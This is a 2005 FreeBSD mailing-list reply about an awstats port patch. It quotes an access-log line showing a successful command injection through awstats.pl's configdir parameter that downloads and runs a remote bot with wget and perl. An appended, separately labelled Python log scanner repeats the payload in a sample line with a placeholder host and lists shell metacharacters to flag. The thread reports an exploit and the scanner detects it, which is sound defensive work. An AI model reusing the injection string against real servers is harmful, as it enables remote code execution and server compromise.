FreeBSD Port: awstats-6.2
Charlie Schluting
charlie at schluting.com
Wed Jan 26 19:53:30 PST 2005
On 1/26/2005 5:20 PM, Andrew J Caines wrote:
> FWIW, I think the original patch posted was lacking some changes in the
> pkg-plist which may or may not have been in the 6.2 update, when various
> bits moved around and the installed files changed.
>
> I've made another[1] for the 6.3 port[2]. This 6.3 port builds, installs,
> runs[3] and deinstalls cleanly. It doesn't specifically address any .jar
> install or other issues.
Indeed, the patch works (had to manually grab the tarball).
FWIW, yes, exploits are definitely in the wild. I grepped my logs for "wget"
and saw one (successful) attempt:
/var/log/httpd-access.log:66.235.209.85 - - [26/Jan/2005:17:43:22 -0800] "GET /awstats/awstats.pl?configdir=%20%7Cecho%20;echo%20;cd%20/var/tmp;wget%20www.theplaza.co.uk/media/bot%20-O%20bot22;perl%20bot22;rm%20-f%20bot*;echo%20;echo%20%7C%20 HTTP/1.1" 200 588 "-" "LWP::Simple/5.65"
If you look at the code on: http://www.theplaza.co.uk/media/bot you'll see
that it tries to start:
www 29943 101.6 0.5 4236 3504 ?? R 5:38PM 113:06.70
/usr/local/apache/bin/httpd -DSS1 (perl)
Fuckers :(
Thanks for the patch!
-Charlie
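An added defensive example, not part of this thread or of the awstats port: a small Python scanner that does what the grep above does more precisely, parsing Apache access-log lines, decoding the `configdir` parameter of awstats.pl requests, and flagging values that contain shell metacharacters. The sample log lines, client IPs and the attacker.invalid host are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (not from the thread); IPs and hosts are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Jan/2005:17:43:22 -0800] "GET /awstats/awstats.pl?configdir=%20%7Cecho%20;cd%20/var/tmp;wget%20attacker.invalid/bot%20-O%20bot22;perl%20bot22;rm%20-f%20bot* HTTP/1.1" 200 588 "-" "LWP::Simple/5.65"
192.0.2.11 - - [26/Jan/2005:18:01:05 -0800] "GET /awstats/awstats.pl?config=example.org&output=main HTTP/1.1" 200 12345 "-" "Mozilla/5.0"
192.0.2.12 - - [26/Jan/2005:18:02:44 -0800] "GET /awstats/awstats.pl?configdir=/etc/awstats HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target protocol", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that have no business inside a configdir value; the injection relies on
# '|' and ';' to break out of the directory argument and chain shell commands.
SHELL_META = set("|;`$&<>\n")

def query_params(query):
    """Split a raw query on '&' only (never on ';', which here is the injected separator)."""
    params = []
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.append((unquote(key), unquote(value)))
    return params

def configdir_injection(target):
    """Return the decoded configdir value when it carries shell metacharacters, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("awstats.pl"):
        return None
    for key, value in query_params(parts.query):
        if key == "configdir" and any(ch in SHELL_META for ch in value):
            return value
    return None

def scan_log(text):
    """Return (client_ip, status, decoded_configdir) for every injection attempt in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            decoded = configdir_injection(m.group("target"))
            if decoded is not None:
                hits.append((m.group("ip"), int(m.group("status")), decoded))
    return hits
```

A 200 status on a flagged line means awstats ran the request, so the host should be treated as compromised rather than merely probed; the decoded value shows exactly what reached the shell.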